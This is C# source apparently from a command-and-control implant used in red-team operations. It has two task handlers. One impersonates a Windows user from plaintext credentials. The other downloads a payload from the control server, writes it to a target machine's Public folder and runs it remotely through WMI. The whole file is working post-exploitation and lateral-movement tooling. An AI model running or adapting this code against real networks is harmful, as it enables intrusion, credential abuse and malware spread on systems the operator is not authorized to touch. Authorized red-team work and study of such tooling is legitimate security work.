/// <summary>
/// Create a token based on the task.@params passed.
/// </summary>
/// <param name="task">Task that holds a Cred JSON dict with the proper values to spawn the process.</param>
public static void MakeToken(Job j)
{
var task = j.Task;
MakeTokenParameter parameters = JsonConvert.DeserializeObject <MakeTokenParameter>(task.parameters);
MythicCredential cred = parameters.credential;
if (string.IsNullOrEmpty(cred.account) || string.IsNullOrEmpty(cred.credential))
{
j.SetError("Username and password are required for make_token.");
return;
}
if (cred.credential_type != "plaintext")
{
j.SetError($"make_token can only be used with plaintext credentials, and was given credentials of type {cred.credential_type}");
return;
}
string userFQDN = cred.account;
if (!string.IsNullOrEmpty(cred.realm))
{
userFQDN = cred.realm + "\\" + userFQDN;
}
else
{
userFQDN = ".\\" + userFQDN;
}
if (!CredentialManager.SetCredential(cred.account, cred.credential, cred.realm))
{
j.SetError($"Failed to make_token with {userFQDN}:{cred.credential}\n\t:Error Code: {Marshal.GetLastWin32Error()}");
return;
}
try
{
string msg = $"Successfully impersonated {CredentialManager.GetCurrentUsername()}";
ApolloTaskResponse resp = new ApolloTaskResponse(task, msg)
{
artifacts = new Artifact[]
{
new Artifact("Logon Event", $"New Type 9 Logon for {CredentialManager.GetCurrentUsername()}")
}
};
j.SetComplete(resp);
}
catch (Exception ex)
{
j.SetError($"Unknown error: {ex.Message}\nStackTrace{ex.StackTrace}");
}
}
public static void Execute(Job job, Agent agent)
{
WMIProcessExecuteParameters parameters = (WMIProcessExecuteParameters)JsonConvert.DeserializeObject <WMIProcessExecuteParameters>(job.Task.parameters);
ApolloTaskResponse resp;
MythicCredential cred = new MythicCredential();
bool success;
byte[] templateFile;
string username = null;
string password = null;
string formattedRemotePath = null;
string fileGuid = Guid.NewGuid().ToString();
if (string.IsNullOrEmpty(parameters.computer))
{
job.SetError("No computer name passed.");
return;
}
if (string.IsNullOrEmpty(parameters.template))
{
job.SetError("No template was given to download.");
return;
}
if (!string.IsNullOrEmpty(parameters.credential))
{
cred = JsonConvert.DeserializeObject <MythicCredential>(parameters.credential);
}
string remotePath = parameters.remote_path;
if (string.IsNullOrEmpty(parameters.remote_path))
{
formattedRemotePath = $"\\\\{parameters.computer}\\C$\\Users\\Public\\{fileGuid}.exe";
remotePath = $"C:\\Users\\Public\\{fileGuid}.exe";
}
else
{
if (Directory.Exists(parameters.remote_path))
{
parameters.remote_path = Path.Combine(parameters.remote_path, $"{fileGuid}.exe");
}
remotePath = parameters.remote_path;
//formattedRemotePath = $"\\\\{parameters.computer}\\{parameters.remote_path.Replace(':', '$')}";
}
try
{
templateFile = agent.Profile.GetFile(job.Task.id, parameters.template, agent.Profile.ChunkSize);
}
catch (Exception ex)
{
job.SetError($"Error fetching remote file: {ex.Message}");
return;
}
if (templateFile == null || templateFile.Length == 0)
{
job.SetError($"File ID {parameters.template} was of zero length.");
return;
}
try
{
File.WriteAllBytes(remotePath, templateFile);
resp = new ApolloTaskResponse(job.Task, $"Copied payload to {remotePath}");
job.AddOutput(resp);
}
catch (Exception ex)
{
job.SetError($"Remote file copy to {remotePath} failed. Reason: {ex.Message}");
return;
}
if (!string.IsNullOrEmpty(cred.account))
{
username = cred.account;
if (!string.IsNullOrEmpty(cred.realm))
{
username = cred.realm + "\\" + username;
}
password = cred.credential;
}
success = WMIUtils.RemoteWMIExecute(parameters.computer, remotePath, out string[] results, username, password);
job.SetComplete(string.Join("\n", results));
}
